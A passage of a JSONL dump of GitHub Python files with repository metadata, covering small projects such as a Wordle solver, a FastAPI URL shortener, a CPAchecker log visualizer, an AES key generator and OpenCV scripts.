__eq__(self, other):\n if not isinstance(other, Api):\n return False\n return self.data == other.data\n\n def match_patches(self, patches):\n for operation in self.operations:\n for patch in patches:\n if patch.path == self.path and patch.method == operation.method:\n assert patch.matched == False\n patch.matched = True\n operation.patch = patch\n\n\nclass Patch(object):\n\n def __init__(self, path, method):\n self.path = path\n self.method = method.lower()\n self.content = '\\n'\n self.matched = False\n\n def __repr__(self):\n return '<Patch:%s %s>' % (self.path, self.method)\n\n def append_content(self, line):\n self.content += line.rstrip() + '\\n'\n \n\n\n\n\n\n\n","repo_name":"taojy123/swagger2raml","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71990873363","text":"def solution(storey):\n answer = 0\n num=[int(i) for i in reversed(str(storey))]\n num+=[0]\n for i in range(len(num)-1):\n if num[i]>5 or (num[i]==5 and num[i+1]>=5):\n answer+=10-num[i]\n num[i+1]+=1\n else:\n answer+=num[i]\n answer+=num[-1]\n return answer","repo_name":"da-in/algorithm-study","sub_path":"Warming Up/마법의 엘리베이터/hyuksoon.py","file_name":"hyuksoon.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"} +{"seq_id":"13608939291","text":"import random\nimport re\nimport emoji\nimport json\nimport pickle\nfrom wordfreq import word_frequency\nfrom time import sleep\nclass WordleSolver():\n def __init__(self) -> None:\n random.seed(42)\n self.small_path = 'words.csv'\n self.large_path = 'guesses.csv'\n\n def load_words(self, small = False):\n wordbank = []\n if small:\n with open(self.small_path, 'r') as f:\n words = f.read()\n wordbank = words.split('\\n')\n wordbank = list(map(lambda word: word.upper(), wordbank))\n else:\n with open(self.large_path, 'r') as f:\n words = f.read()\n wordbank = words.split('\\n')\n wordbank = list(map(lambda word: word.upper(), wordbank))\n return wordbank\n\n \n\n def get_regex(self, guess, ans_grid):\n guess = guess.upper()\n discarded = []\n misplaced = []\n build = ''\n for i in range(5):\n if ans_grid[i] == 0:\n discarded.append(guess[i])\n for i in range(5):\n if ans_grid[i] == 2:\n build += guess[i]\n elif ans_grid[i] == 1:\n misplaced.append(guess[i])\n build += f'[^{guess[i]}{\"\".join(discarded)}]'\n else:\n build+= f'[^{\"\".join(discarded)}]'\n return build, misplaced\n\n def get_possible_words(self, guess, ans_grid, wordbank = []):\n if not wordbank:\n wordbank = self.load_words()\n possibilities = []\n restring, misplaced = self.get_regex(guess, ans_grid)\n for word in wordbank:\n if re.match(restring, word):\n possibilities.append(word)\n filtered = []\n for letter in misplaced:\n for word in possibilities:\n if letter not in word:\n filtered.append(word)\n for word in set(filtered):\n possibilities.remove(word)\n possibilities = sorted(possibilities, key=lambda x: word_frequency(x, 'en'), reverse=True)\n return possibilities\n \n def assistant(self,wordbank = [], random_word = True):\n guess = input('Please enter guess : ')\n ans_grid = input('Please enter answer grid:\\n0 - letter not in word\\n1 - letter in word but wrong position\\n2 - letter in correct position:\\n')\n ans_grid = list(map(lambda x: int(x), list(ans_grid)))\n possible = self.get_possible_words(guess, ans_grid, wordbank)\n if len(possible) == 1 or sum(ans_grid) == 10:\n print('Congratulations. The answer is :', possible[0])\n sleep(2)\n exit()\n if len(possible) > 15:\n if random_word:\n print(f'{len(possible)} possibilities. Choosing random word: {random.choice(possible)}')\n else:\n print(f'{len(possible)} possibilities. Choosing most frequent word: {possible[0]}')\n else:\n print(f'{len(possible)} possibilities:\\n{possible} ')\n proceed = input('Continue? (Y/N): ')\n \n if proceed.upper() == 'Y':\n self.assistant(possible)\n else:\n print(\"Thanks for playing\")\n sleep(2)\n\nif __name__ == '__main__':\n solver = WordleSolver()\n solver.assistant()","repo_name":"omni64/wordle_solver","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1072527859","text":"#!/usr/bin/env python3\n\n\"\"\"\nModule that contains definitions for application routes\n\"\"\"\n\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef hello_world():\n \"\"\"\n Returns the basic index page for the application\n :return: 0-index.html template\n \"\"\"\n return render_template('0-index.html')\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"INChukwudi/alx-backend","sub_path":"0x02-i18n/0-app.py","file_name":"0-app.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16661548604","text":"from fastapi import status, HTTPException\nfrom fastapi.responses import RedirectResponse\nfrom fastapi.routing import APIRouter\nfrom app.usecases import shorten_url as shorten_url_usecase\nfrom app.usecases.exceptions import AliasAlreadyExistsException, AliasNotFoundException\n\n\nrouter = APIRouter()\nrepo = shorten_url_usecase.InMemoryUrlRepository()\n\n\n@router.post(\n \"/shorten\",\n status_code=status.HTTP_201_CREATED,\n response_model=shorten_url_usecase.ShortenResponse,\n)\nasync def shorten_url(schema: shorten_url_usecase.ShortenRequest):\n try:\n url = shorten_url_usecase.shorten(schema, repo=repo)\n except AliasAlreadyExistsException:\n raise HTTPException(\n status_code=status.HTTP_409_CONFLICT,\n detail=\"Alias already exists\",\n )\n return url\n\n\n@router.get(\"/r/{alias}\")\nasync def redirect(alias: str):\n redirect_request = shorten_url_usecase.RedirectRequest(alias=alias)\n\n try:\n usecase_response = shorten_url_usecase.redirect(redirect_request, repo=repo)\n except AliasNotFoundException:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"URL not found\",\n )\n\n return RedirectResponse(usecase_response.url)\n\n\n@router.get(\"/health\")\nasync def health():\n return {\"status\": \"ok\"}\n","repo_name":"carlosporta/link-shortener","sub_path":"app/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35296902892","text":"import hometrainer.core as core\nfrom hometrainer.config import Configuration\nimport time\nimport concurrent.futures\nimport numpy as np\n\n\nclass Agent:\n \"\"\"Agent that is able to play a game. This means it can take an game state and give it's best move.\n\n The agent get's some more lifecycle callbacks if it needs to for example note moves of the enemy to\n improve its decisions. An agent is usually an AI program that calculates a good move,\n but can also be an interface for an human player to compete in an match.\n\n Note: Agents must be able to be copied, as they might be initialized multiple times for one match\n with more than two players. This helps you if your agent holds player specific state.\"\"\"\n def game_start(self, game_state, agents_player):\n \"\"\"Called when the new game starts. Can be used for setup code.\"\"\"\n pass\n\n def find_move_with_time_limit(self, game_state, move_time):\n \"\"\"Implement your logic to find a move with a given time limit in here.\"\"\"\n raise NotImplementedError('Move finding (time limit) method not implemented!')\n\n def find_move_with_iteration_limit(self, game_state, move_iterations):\n \"\"\"Implement your logic to find a move with a given iteration limit in here.\"\"\"\n raise NotImplementedError('Move finding (iteration limit) method not implemented!')\n\n def move_executed(self, old_game_state, move, new_game_state):\n \"\"\"Called after a move was executed in the current game.\"\"\"\n pass\n\n def game_ended(self, game_state):\n \"\"\"Called when the game ended. Can be used for teardown code.\"\"\"\n pass\n\n\nclass NeuralNetworkAgent(Agent):\n \"\"\"Agent using a neural network and the alpha zero search for finding moves.\"\"\"\n def __init__(self, nn_client, config: Configuration, collect_evaluations=False, temperature=None):\n \"\"\"\n :param nn_client: The neural network client used to get evaluations\n :param collect_evaluations: If true a evaluations will be created using the search trees from each executed move\n :param temperature: If set to a value moves will be chosen probabilistic using this temperature\n \"\"\"\n self.nn_client = nn_client\n\n self.collect_evaluations = collect_evaluations\n self.collected_evaluations = []\n\n self.temperature = temperature\n self.config = config\n\n self.current_mcts_node = None\n self.thread_pool = None\n\n def game_start(self, game_state, agents_player):\n self.current_mcts_node = core.MCTSNode(1.0, game_state, self.config)\n\n n_threads = self.config.n_search_threads_selfplay()\n self.thread_pool = None\n if n_threads > 1:\n self.thread_pool = concurrent.futures.ThreadPoolExecutor(n_threads)\n\n self.nn_client.start(self.config)\n\n def find_move_with_time_limit(self, game_state, move_time):\n move_end_time = time.time() + move_time\n\n while True:\n self._run_mcts_simulations(16)\n if move_end_time < time.time():\n break\n\n self._create_evaluation()\n return self._find_best_move()\n\n def find_move_with_iteration_limit(self, game_state, move_iterations):\n self._run_mcts_simulations(move_iterations)\n self._create_evaluation()\n return self._find_best_move()\n\n def _run_mcts_simulations(self, n_simulations):\n # We can run serial or parallel in a thread pool\n if not self.thread_pool:\n for i in range(n_simulations):\n self.current_mcts_node.run_simulation_step(self.nn_client)\n else:\n futures = []\n for i in range(n_simulations):\n futures.append(self.thread_pool.submit(self.current_mcts_node.run_simulation_step, self.nn_client))\n concurrent.futures.wait(futures)\n\n def _find_best_move(self):\n # Either select probabilistic or simply take the best move.\n if self.temperature:\n move_probabilities = self.current_mcts_node.move_probabilities(self.temperature).items()\n moves = [item[0] for item in move_probabilities]\n probabilities = [item[1] for item in move_probabilities]\n\n # Select the move according to the probability distribution\n index = np.random.choice(len(moves), p=probabilities)\n return moves[index]\n else:\n move_probabilities = self.current_mcts_node.move_probabilities(1.0)\n best_move = None\n best_prob = -1\n\n for move, prob in move_probabilities.items():\n if prob > best_prob:\n best_prob = prob\n best_move = move\n\n return best_move\n\n def _create_evaluation(self):\n \"\"\"Creates an evaluation of the current MCTSExecutor and adds it to the collected evaluations for this run\"\"\"\n if not self.collect_evaluations:\n return\n\n evaluation = self.current_mcts_node.game_state.wrap_in_evaluation()\n evaluation.set_move_probabilities(self.current_mcts_node.move_probabilities(1.0))\n\n self.collected_evaluations.append(evaluation)\n\n def move_executed(self, _, move, new_game_state):\n # Try to keep parts of the tree if possible\n if self.current_mcts_node and self.current_mcts_node.children and self.current_mcts_node.children[move]:\n self.current_mcts_node = self.current_mcts_node.children[move]\n else:\n self.current_mcts_node = core.MCTSNode(1.0, new_game_state, self.config)\n\n def game_ended(self, game_state):\n # If we did collect evaluations update them according to the actual results.\n actual_game_result = game_state.calculate_scores()\n for evaluation in self.collected_evaluations:\n evaluation.set_expected_result(actual_game_result)\n\n # Tear down any resources left\n self.thread_pool.shutdown(wait=False)\n\n # Stop NN client\n self.nn_client.stop()\n","repo_name":"FritzFlorian/hometrainer","sub_path":"hometrainer/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":5996,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"31941434476","text":"import argparse\nimport json\nimport sys\nimport webbrowser\nfrom pathlib import Path\nfrom datetime import datetime\n\nfrom typing import Dict\n\nfrom airium import Airium\n\nimport networkx as nx\nimport pydot\n\nENCODING = \"UTF-8\"\n\n\ndef create_arg_parser():\n parser = argparse.ArgumentParser(description=\"Transforms Worker logs to HTML.\")\n parser.add_argument(\n \"--messages-json\",\n help=\"Path to JSON file that contains messages sent during distributed block analysis.\",\n default=\"output/block_analysis/block_analysis.json\",\n )\n parser.add_argument(\n \"--block-structure-json\",\n help=\"Path to JSON file that contains the block structure used for\"\n \" distributed block analysis\",\n default=\"output/block_analysis/blocks.json\",\n )\n parser.add_argument(\n \"-o\",\n \"--output\",\n help=\"Output path for generated files\",\n default=\"output/block_analysis\",\n )\n return parser\n\n\ndef parse_args(argv):\n parser = create_arg_parser()\n args = parser.parse_args(argv)\n\n args.block_structure_json = Path(args.block_structure_json)\n if not args.block_structure_json.exists():\n raise ValueError(f\"Path {args.block_structure_json} does not exist.\")\n\n args.messages_json = Path(args.messages_json)\n if not args.messages_json.exists():\n raise ValueError(f\"Path {args.messages_json} does not exist.\")\n\n args.output = Path(args.output)\n return args\n\n\ndef parse_jsons(json_file: Path):\n with open(json_file, encoding=ENCODING) as inp:\n return json.load(inp)\n\n\ndef html_for_message(message, block_log: Dict[str, str]):\n div = Airium()\n\n if not message:\n with div.div():\n div(\"\")\n return str(div), \"\"\n\n infos = block_log[message[\"from\"]]\n\n predecessors = infos.get(\"predecessors\", [])\n successors = infos.get(\"successors\", [])\n result = message.get(\"payload\", \"no contents available\")\n direction = message[\"type\"]\n arrow = \"-\"\n senders = [\"all\"]\n receivers = [\"all\"]\n if direction == \"BLOCK_POSTCONDITION\":\n receivers = successors\n senders = predecessors\n arrow = \"↓\"\n elif direction == \"ERROR_CONDITION\":\n receivers = predecessors\n senders = successors\n arrow = \"↑\"\n elif direction == \"ERROR_CONDITION_UNREACHABLE\":\n receivers = [\"all\"]\n senders = successors\n arrow = \"↑\"\n elif direction == \"FOUND_RESULT\":\n senders = [message[\"from\"]]\n\n code = \"\\n\".join([x for x in infos[\"code\"] if x])\n\n with div.div(title=code):\n with div.p():\n with div.span():\n div(arrow)\n with div.span():\n sender = \"self\"\n if senders:\n sender = \", \".join(senders)\n else:\n sender = \"None\"\n div(f\"React to message from <strong>{sender}</strong>:\")\n with div.p():\n if receivers:\n receiver = \", \".join(receivers)\n else:\n receiver = \"None\"\n div(f\"Calculated new {direction} message for <strong>{receiver}</strong>\")\n div.textarea(_t=result)\n\n return str(div)\n\n\ndef html_dict_to_html_table(all_messages, block_logs: Dict[str, str]):\n first_timestamp = int(all_messages[0][\"timestamp\"])\n timestamp_to_message = {}\n sorted_keys = sorted(block_logs.keys(), key=lambda x: int(x[1::]))\n index_dict = {}\n for index in enumerate(sorted_keys):\n index_dict[index[1]] = index[0]\n for message in all_messages:\n timestamp_to_message.setdefault(\n message[\"timestamp\"] - first_timestamp, [\"\"] * len(block_logs)\n )[index_dict[message[\"from\"]]] = message\n headers = [\"time\"] + sorted_keys\n table = Airium()\n with table.table(klass=\"worker\"):\n # header\n with table.tr(klass=\"header_row\"):\n for key in headers:\n table.th(_t=f\"{key}\")\n\n # row values\n type_to_klass = {\n \"BLOCK_POSTCONDITION\": \"precondition\",\n \"ERROR_CONDITION\": \"postcondition\",\n \"ERROR_CONDITION_UNREACHABLE\": \"postcondition\",\n }\n for timestamp, messages in timestamp_to_message.items():\n with table.tr():\n table.td(_t=str(timestamp))\n for msg in messages:\n if not msg:\n table.td()\n else:\n klass = type_to_klass.get(msg[\"type\"], \"normal\")\n table.td(klass=klass, _t=html_for_message(msg, block_logs))\n\n return str(table)\n\n\ndef visualize_blocks(\n block_structure_file: Path,\n output_path: Path,\n output_dot_name=\"graph.dot\",\n output_png_name=\"graph.png\",\n):\n g = nx.DiGraph()\n block_logs = parse_jsons(block_structure_file)\n for key in block_logs:\n code = \"\\n\".join(c for c in block_logs[key][\"code\"] if c)\n label = key + \":\\n\" + code if code else key\n g.add_node(key, shape=\"box\", label=f'\"{label}\"')\n for key in block_logs:\n if \"successors\" in block_logs[key]:\n for successor in block_logs[key][\"successors\"]:\n g.add_edge(key, successor)\n\n output_path.mkdir(parents=True, exist_ok=True)\n graph_dot = output_path / output_dot_name\n nx.drawing.nx_pydot.write_dot(g, str(graph_dot))\n (graph,) = pydot.graph_from_dot_file(str(graph_dot))\n graph.write_png(str(output_path / output_png_name))\n\n\ndef export_messages_table(\n *,\n all_messages,\n block_logs,\n output_path,\n report_filename=\"report.html\",\n message_table_html_file=None,\n message_table_css_file=None,\n):\n if message_table_html_file is None:\n message_table_html_file = Path(__file__).parent / \"table.html\"\n if message_table_css_file is None:\n message_table_css_file = Path(__file__).parent / \"table.css\"\n\n for message in all_messages:\n # 2022-03-10 14:44:07.0318755\n message[\"timestamp\"] = int(\n datetime.strptime(message[\"timestamp\"], \"%Y-%m-%d %H:%M:%S.%f\").timestamp()\n )\n all_messages = sorted(\n all_messages, key=lambda entry: (entry[\"timestamp\"], entry[\"from\"][1::])\n )\n\n output_path.mkdir(parents=True, exist_ok=True)\n with open(message_table_html_file, encoding=ENCODING) as html:\n with open(message_table_css_file, encoding=ENCODING) as css:\n text = (\n html.read()\n .replace(\n \"<!--<<<TABLE>>><!-->\",\n html_dict_to_html_table(all_messages, block_logs),\n )\n .replace(\"/*CSS*/\", css.read())\n )\n output_file = output_path / report_filename\n with open(output_file, \"w+\", encoding=ENCODING) as new_html:\n new_html.write(text)\n return output_file\n\n\ndef visualize_messages(messages_file: Path, output_path: Path):\n block_logs = parse_jsons(messages_file)\n all_messages = []\n for key in block_logs:\n if \"messages\" in block_logs[key]:\n all_messages += block_logs[key][\"messages\"]\n if not all_messages:\n return\n\n export_filename = export_messages_table(\n all_messages=all_messages, block_logs=block_logs, output_path=output_path\n )\n webbrowser.open(str(export_filename))\n\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv[1:]\n args = parse_args(argv)\n output_path: Path = args.output\n\n visualize_blocks(\n block_structure_file=args.block_structure_json, output_path=output_path\n )\n\n visualize_messages(messages_file=args.messages_json, output_path=output_path)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"sosy-lab/cpachecker","sub_path":"contrib/worker-visualization/log_to_html.py","file_name":"log_to_html.py","file_ext":"py","file_size_in_byte":7725,"program_lang":"python","lang":"en","doc_type":"code","stars":202,"dataset":"github-code","pt":"3"} +{"seq_id":"71556302801","text":"#!/usr/bin/env python3.9\n\n\"\"\"A usefull cogs for League of legends.\"\"\"\n\nimport discord\nfrom discord.ext import commands\n\n\nclass Lol(commands.Cog):\n \"\"\"Classe d'outils pour League of legends.\"\"\"\n\n # ###### #\n # Events #\n # ###### #\n\n @commands.Cog.listener()\n async def on_ready(self):\n \"\"\"Déclare être prêt.\"\"\"\n print(\" Lol's Cog is ready.\")\n\n @commands.Cog.listener(name=\"game launched\")\n async def game_launched(self, ctx: commands.Context):\n \"\"\"Notifie dés qu'une personne lance un jeu\"\"\"\n async for m in ctx.guild.members:\n if m.activity == discord.ActivityType.playing:\n print(f\"{m.display_name} joue à {m.activity.game}\")\n\n # ######### #\n # Functions #\n # ######### #\n\n\n # ######### #\n # Commandes #\n # ######### #\n\n @commands.command(aliases=[\"alias_de_une_commande\"])\n @access.me # droit d'utilisation aux commandes\n async def une_commande(self, ctx: commands.Context, *, txt: str):\n \"\"\"Une commande dont je ne connais pas l'utilité.\"\"\"\n await ctx.send(fcite(txt))\n\n\n @commands.command()\n @access.me\n async def lol_test(self, ctx: commands.Context, *, txt: str):\n \"\"\"Commande de test\"\"\"\n await ctx.send(ctx.author.activities[0].name)\n\n\ndef setup(bot: commands.Bot):\n \"\"\"Setup the bot for the main cog.\"\"\"\n bot.add_cog(Lol(bot))","repo_name":"ValentinColin/yukki","sub_path":"cogs/dev/lol.py","file_name":"lol.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19520079795","text":"# Given an array x (e.g. [1,5, 10, 7, -2]), create an algorithm (sets of instructions) that shifts each number by one (to the front). For example when the program is done x (assuming it was [1,5,10,7,-2]) should become [5,10,7,-2, 0]. \n\ndef shiftingArrValues(arr, x=0):\n if x == len(arr)-1:\n arr[x] = 0\n return arr\n arr[x] = arr[x+1]\n return shiftingArrValues(arr, x+1)\n\nprint(shiftingArrValues([1, 5, 10, 7, -2]))","repo_name":"Nolan0796/My_Daily_Algorithm_Practice","sub_path":"3-9-22.py","file_name":"3-9-22.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24323077570","text":"import cv2\nimport numpy as np\nfrom os import listdir\nfrom os.path import isfile, join\nfrom imutils.object_detection import non_max_suppression\nimport maths\n\ndef identify(image, templateDir, threshold=0.5): \n boxes = []\n pair = []\n imageGray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n templates = [f for f in listdir(templateDir) if isfile(join(templateDir, f))]\n\n for template in templates:\n templateGray = cv2.resize(cv2.imread(templateDir + template, cv2.IMREAD_GRAYSCALE), dsize=(0, 0), fx=0.3, fy=0.3)\n (tH, tW) = templateGray.shape[:2]\n\n result = cv2.matchTemplate(imageGray, templateGray, cv2.TM_CCOEFF_NORMED)\n (ys, xs) = np.where(threshold < result)\n\n rects = []\n for (x, y) in zip(xs, ys):\n rects.append((x, y, x + tW, y + tH))\n\n filtered = non_max_suppression(np.array(rects))\n \n for x in filtered:\n boxes.append(x)\n pair.append((x, template))\n\n recognitions = non_max_suppression(np.array(boxes))\n tmp = pair.copy()\n\n removedCount = 0\n for i in range(0, len(pair)):\n (box, template) = pair[i]\n\n if(box not in recognitions):\n tmp.pop(i - removedCount)\n removedCount += 1\n\n recognitionCenters = [maths.getCenter(x[0]) for x in tmp]\n dist = []\n overlapping = [] #store indexes of overlapping boxes\n\n for ii in range(0, len(tmp)):\n (box, template) = tmp[ii]\n if(template == \"pc.PNG\" or template == \"server.PNG\"):\n continue\n\n boxCenter = maths.getCenter(box)\n dist = [maths.getDistance(boxCenter, x) for x in recognitionCenters]\n\n collisionID = [i for i in range(len(dist)) if dist[i] == 1]\n\n if len(collisionID) == 1:\n overlapping.append(collisionID[0])\n \n if 1 <= len(overlapping):\n for ovI in overlapping:\n del tmp[ovI]\n\n return tmp","repo_name":"Remory52/AutoNetworking","sub_path":"extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42279615658","text":"import cv2\nfrom cv2 import VideoCapture\nfrom cv2 import waitKey\nprint(cv2.__version__)\n\nvideo = cv2.videoCapture(\"video.mov\")\nwhile True:\n ret, frame = video.read()\n frame = cv2.resize(frame, (1000, 600))\n\n if ret == False:\n break\n\n cv2.imshow(\"Output\", frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\ncv2.destroyAllWindows()\nvideo.release()\n\n","repo_name":"AtangBofelo/Fire-Detection-System","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28840999822","text":"import requests\nfrom datetime import datetime\nimport os\n\n\nUSERNAME = os.environ[\"USERNAME\"]\nTOKEN = os.environ[\"TOKEN\"]\n\npixela_endpoint = \"https://pixe.la/v1/users\"\n\nuser_params = {\n \"token\": TOKEN,\n \"username\": USERNAME,\n \"agreeTermsOfService\": \"yes\",\n \"notMinor\": \"yes\"\n}\n\n# response = requests.post(url=pixela_endpoint, json=user_params)\n# print(response.text)\n\ngraph_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs\"\n\nGRAPH_ID = \"graph1\"\n\ngraph_config = {\n \"id\": GRAPH_ID,\n \"name\": \"Cycling Graph\",\n \"unit\": \"Km\",\n \"type\": \"float\",\n \"color\": \"ichou\"\n}\n\nheaders = {\n \"X-USER-TOKEN\": TOKEN\n}\n\n# response = requests.post(url=graph_endpoint, json=graph_config, headers=headers)\n# print(response.text)\n\npixel_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}\"\n\ntoday = datetime.now()\n\npixel_params = {\n \"date\": today.strftime(\"%Y%m%d\"),\n \"quantity\": input(\"How many kilometers did you cycle today? \"),\n}\n\nresponse = requests.post(url=pixel_endpoint, json=pixel_params, headers=headers)\nprint(response.text)\n\nupdate_pixel_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}/{today.strftime('%Y%m%d')}\"\n\nupdate_pixel_params = {\n \"quantity\": \"10\"\n}\n\n# response = requests.put(url=update_pixel_endpoint, json=update_pixel_params, headers=headers)\n# print(response.text)\n\ndelete_pixel_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs/{GRAPH_ID}/{today.strftime('%Y%m%d')}\"\n\n# response = requests.delete(url=delete_pixel_endpoint, headers=headers)\n# print(response.text)\n","repo_name":"Solutionhod/habit-tracker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10050225311","text":"# AES Cipher Key Generation\n# Author: Jonathan Kenney (M08837382)\n\n# imports\nfrom sys import argv\nfrom os import urandom\n\ndef main():\n \n # get key size from args\n try:\n key_size = int(argv[1])\n except:\n print('\\nUsage:\\npython3 keygen.py [KEY_SIZE]\\n')\n exit(1)\n\n # check supplied key size\n if key_size not in (16, 24, 32):\n print('ERROR: Invalid key size, must be in {16, 24, 32}\\n')\n exit(1)\n\n # returns random key (bytes) from OS and converts to hex\n key = urandom(key_size).hex()\n\n # print key (in hex) to stdout\n print('Secret key: %s' % key)\n\n # store key (in hex) in file\n with open('./data/key.txt', 'w') as f:\n f.write(key)\n f.close()\n\n return\n\n# main boilerplate\nif __name__ == '__main__':\n main()","repo_name":"joonsberry/aes","sub_path":"build/keygen.py","file_name":"keygen.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18666416367","text":"from h2o_wave import Q, ui, main, app\n\n\n@app('/demo/nav')\nasync def serve2(q: Q):\n if '#' in q.args:\n hash_ = q.args['#']\n q.page['nav'] = ui.form_card(box='1 1 2 5', items=[\n ui.text(f'#={hash_}'),\n ui.button(name='show_nav', label='Back', primary=True),\n ])\n else:\n q.page['nav'] = ui.nav_card(\n box='1 1 2 5',\n value='#menu/spam',\n items=[\n ui.nav_group('Menu', items=[\n ui.nav_item(name='#menu/spam', label='Spam'),\n ui.nav_item(name='#menu/ham', label='Ham'),\n ui.nav_item(name='#menu/eggs', label='Eggs'),\n ui.nav_item(name='#menu/toast', label='Toast', disabled=True),\n ]),\n ui.nav_group('Help', items=[\n ui.nav_item(name='#about', label='About', icon='Info'),\n ui.nav_item(name='#support', label='Support', icon='Help'),\n ])\n ],\n )\n await q.page.save()\n\n\n@app('/demo/theme')\nasync def serve1(q: Q):\n if not q.client.initialized:\n q.page['meta'] = ui.meta_card(box='')\n q.page['controls'] = ui.form_card(box='1 1 2 8', items=[\n ui.text_xl('Form'),\n ui.textbox(name='textbox', label='Textbox'),\n ui.toggle(name='toggle', label='Toggle'),\n ui.choice_group(name='choice_group', label='Choice group', choices=[\n ui.choice(name=x, label=x) for x in ['Egg', 'Bacon', 'Spam']\n ]),\n ui.checklist(name='checklist', label='Checklist', choices=[\n ui.choice(name=x, label=x) for x in ['Egg', 'Bacon', 'Spam']\n ]),\n ui.dropdown(name='dropdown', label='Dropdown', choices=[\n ui.choice(name=x, label=x) for x in ['Egg', 'Bacon', 'Spam']\n ]),\n ui.slider(name='slider', label='Slider'),\n ui.button(name='toggle_theme', label='Toggle Theme', primary=True)\n ])\n q.client.theme = 'default'\n q.client.initialized = True\n\n meta = q.page['meta']\n\n if q.args.toggle_theme:\n meta.theme = q.client.theme = 'neon' if q.client.theme == 'default' else 'default'\n\n await q.page.save()\n","repo_name":"n-raghu/KnowledgeBase","sub_path":"python/water/src/testo.py","file_name":"testo.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"742007552","text":"from troposphere import Ref, Template, Parameter, Output, Join, GetAtt\nimport troposphere.ec2 as ec2\nt=Template()\n#SecurityGroup\n#AMIID and instanceID\n#SSH key pair\n\nsg = ec2.securityGroup(\"Lampsg\")\nsg.GroupDescription = \"Allow access through ports 80 and 22 to the web server\"\nsg.SecurityGroupIngress = [\n\tec2.SecurityGroupRule(IpProtocol = \"tcp\", FromPort = \"22\", ToPort = \"22\", CidrIp = \"0.0.0.0/0\"),\n\tec2.SecurityGroupRule(IpProtocol = \"tcp\", FromPort = \"80\", ToPort = \"80\", CidrIp = \"0,0,0,/0\"),\n]\n\nt.add_resource(sg)\n\nprint(t.to_json())\n","repo_name":"aswa-software-services/devops","sub_path":"webserver-cf.py","file_name":"webserver-cf.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42350661171","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom PIL import Image\nimport os\npath = 'C:\\\\Users\\\\Small\\\\Desktop\\\\newmyyolo4\\\\Oimages'\nnamelist1=os.listdir(path+\"\\\\Pending\")\nnamelist2=[]\nangle = [0,30,60,90,120,150,180,210,240,270,300,330]\nfor i in namelist1:\n if not os.listdir(path+\"\\\\Pending\\\\\"+i): #判斷資料夾是否為空\n continue\n if not os.path.isdir(path+\"\\\\New sample\\\\\"+i):\n os.makedirs(path+\"\\\\New sample\\\\\"+i) \n count =len(os.listdir(path+\"\\\\New sample\\\\\"+i)) #統計目前所有以處理相片\n namelist2=os.listdir(path+\"\\\\Pending\\\\\"+i)\n for j in namelist2:\n \n for ang in angle:\n count+=1\n img = Image.open(path+\"\\\\Pending\\\\\"+i+\"\\\\\"+j)\n new_img = img.rotate(ang) \n new_img.save(path+\"\\\\New sample\\\\\"+i+\"\\\\\"+i+\"{:0>5d}\".format(count)+\".jpg\")\n \n\n\n'''\nfor i in range(1,6):\n img = Image.open(\"chenting\"+str(i)+\".jpg\")\n img2 = Image.open(\"shiru\"+str(i)+\".jpg\")\n new_img = img.rotate(135) \n new_img2 = img2.rotate(135) \n new_img.save(\"chenting\"+str(i+15)+\".jpg\")\n new_img2.save(\"shiru\"+str(i+15)+\".jpg\")\n \n new_img = img.rotate(180) \n new_img2 = img2.rotate(180) \n new_img.save(\"chenting\"+str(i+20)+\".jpg\")\n new_img2.save(\"shiru\"+str(i+20)+\".jpg\")\n \n new_img = img.rotate(225) \n new_img2 = img2.rotate(225) \n new_img.save(\"chenting\"+str(i+25)+\".jpg\")\n new_img2.save(\"shiru\"+str(i+25)+\".jpg\")\n \n new_img = img.rotate(270) \n new_img2 = img2.rotate(270) \n new_img.save(\"chenting\"+str(i+30)+\".jpg\")\n 